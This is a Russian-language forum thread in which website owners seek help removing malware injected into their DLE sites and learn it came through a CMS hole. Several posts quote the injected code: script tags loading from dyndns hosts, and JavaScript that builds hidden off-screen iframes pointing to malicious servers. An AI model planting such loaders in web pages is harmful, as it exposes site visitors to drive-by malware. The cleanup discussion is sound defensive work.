|
Вирус на сайте, нужна помощь
Добрый вечер. Сегодня после обеда заметил неприятную особенность на сайте. Постоянно ругается антивирус на разные адреса, так же видно что подвал сайта нарушен. Но тела вируса найти мне не удалось (( Помогите пожалуйста решить проблему, где найти тело вируса и как это лечится ? Сайт unechanews.ru
|
][alter, не вижу проблемы... На сайт не ругается, подвал вроде бы в порядке... А лечится это, как и обычные вирусы - антивирусом. Приведи скрин "ругания" антивируса.
|
][alter, приведите подробности, а то будет бан по п. 3.4 :)
|
Сегодня я уже попал в под фильтр оперы ((.
В подвале явно что то чужеродное так как он сломан. Но я не могу найти где что (( Скрины: http://imageshack.us/photo/my-images/171/83474025.jpg/ http://imageshack.us/photo/my-images/823/63180071.jpg/ На работе сегодня антивирус не ругается. Буду дома проверю как там дела обстоят. |
При заходе на сайт, антивирус NOD, находит угрозу HTML/iframe.B.Gen.
|
Да у меня именно nod32 ругается. Как с этим бороться и самое главное как туда это попало?
|
в DOM нашел это
Код:
<script src="http://u4a.dyndns.tv/followbb.php?i=19703" language="JavaScript">Код:
var frame = document.createElement('ifr'+'ame'); frame.style.position = 'absolute'; frame.style.left = '-1000px'; frame.src='http://sell00.dyndns-ip.com/main.php?page=7f8d1ec15718a56f'; document.body.appendChild(frame); var frame = document.createElement('ifr'+'ame'); frame.style.position = 'absolute'; frame.style.left = '-1000px'; frame.src='http://178.63.96.144/?rbb'; document.body.appendChild(frame); var frame = document.createElement('ifr'+'ame'); frame.style.position = 'absolute'; frame.style.left = '-1000px'; frame.src='http://u4a.dyndns.tv/?inid=19703&intime=657645061'; document.body.appendChild(frame);в шаблоне он просто Код:
<script language='JavaScript' src='http://u4a.dyndns.tv/followbb.php?i=19703'></script>Проблема не столько в самом ифрейме, сколько в возможности добавить что угодно в шаблон. Смотрите дыры в движке и исправляйте, иначе потеряете данные. |
Нашел в index.php.
Цитата:
|
Учитывая что мне уже неплохо помогли на озоне, снова обращаюсь за помощью.
Мое почтение Уважаемые знатоки! Сегодня мне пришло сообщение от Яндекса, что у меня вирус на сайте. Проверял сайт на вирус тотале, все по нолям. Решил сам просмотреть через IE HTML своей страницы и обнаружил такую вещь. Цитата:
Подскажите пожалуйста, исходя из приведенного куска кода, где мне искать эту падлюку. Сам увы найти не могу. Помогите пожалуйста! Могу в случае необходимости залить куда нибуть весь код. PS Методом тыка выяснилось, что этот код видно,только когда заходишь на сайт без логина своего. Просто как посетитель без аккаунта. |
<script src="http://wildfuckers.dyndns.ws/showforum.php?pid=54543" type="text/javascript"></script>
Это. Гугли по этому коду. Ищи ошибки в модулях CMS. Прикрывай дырку. |
Severny, Да да дружище. Именно эта хрень, но где ее найти понятия не имею. Перелопатил кучу файлов но так и не смог найти.
|
CMS какая?
|
Severny, Благодарю за подсказку, буду рыть
DLE 9.7 Еще как вариант С проверки сайта Цитата:
|
|
Severny, Я был уже там, благодаря вашей подсказке. Уже почти все файлы из папки модули перерыл но так ничего и не нашел :sorry:
|
Нашел код в папке modules\файл functions.php
Но вот как он туда сцуко попал, это вопрос уже. :cry: |
Цитата:
Я вот по своей Modx стараюсь постоянно отслеживать. У меня тоже было заражение одного сайта на дополнительном домене. Я владельцу дал с дуру админские права для редактирования. У него система была заражена. Сайт тоже следом. Хостер начал верещать, что идет рассылка с сайта, прикрыл доступ. Почему я сделал вывод, что заражение с компа владельца - был заражен только его сайт, остальные дополнительные на этой версии CMS не были заражены. Посмотри, у кого админские права есть, ограничь, проверь свою систему. |
Severny,
Доступ к файлам сайта, имею только я. Да и в конце то концов, не сайт же Пентагона :lol: Кому блин понадобился, не понятно. К файлу functions.php, через админку сайта не подобраться, только по FTP а тут доступ у меня одного. Пароли блин 15 значные, не верится что кому то понадобилось таки взламывать блин. И главное, недавно ведь гадость появилась. Проверил бэкап февральский, там нет ничего. По ходу пока в больнице лежал, впиндюрили его. Я так то слежу ведь за этим. буду сейчас девелоперов длевский сношать блин. У меня ведь лицензия, гады такие  |
Никто специально и не взламывает. Вирус проходит или через уязвимость, или через комп пользователя, когда права полные.
Цитата:
Цитата:
|
Severny, Очень вам благодарен дружище, за помощь! Система у меня чистая и хорошо защищенная. Хотя и на старуху..., как говорится. Только что скачал от девелоперов патч и установил его. Оченнно сильно звинялись, как ни странно. :o
|
Цитата:
|
Severny, Да не так уж конечно :laugh: Теперь я ваще :oszone:
|
SOS!!!! SOS!!!!
Снова проблема с сайтом, но сейчас вообще тупиковая ситуация. Яша прислал письмо, что сайт заражен. http://stdclub.name/2013/05/26/ zeroesassay.battingyw.in Troj/ExpJS-IE Но это блин страница целая и где искать ентого чертового зловреда? Проверкой на других онлайн сервисах, выдает что сайт чист как невинный ребенок. Что делать? Помогите пожалуйста. PS нашел информацию что атака связана с statuses.ws Проверил по рекомендациям файлы Цитата:
Люди добрые отзовитесь. Замучился уже откатывать сайт из бэкапов. Помогите справится с вирусом. Проверил сегодня сайт на http://sitecheck.sucuri.net Выдал результат неутешительный((( Цитата:
Details: http://sucuri.net/malware/malware-entry-mwjsanon7 <script src="http://vttcmgr.no-ip.org/showforum.php?pid=152" type="text/javascript"></script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> На всех перечисленных страницах. |
Друзья, снова требуется помощь. На этот раз вообще ситуация патовая.
Стоит ограничение доступа к сайту на DLE по IP, но все равно кто то получает доступ. Вносит изменения в файлы сайта. Как такое возможно? |
| Время: 01:28. |
Время: 01:28.
© OSzone.net 2001-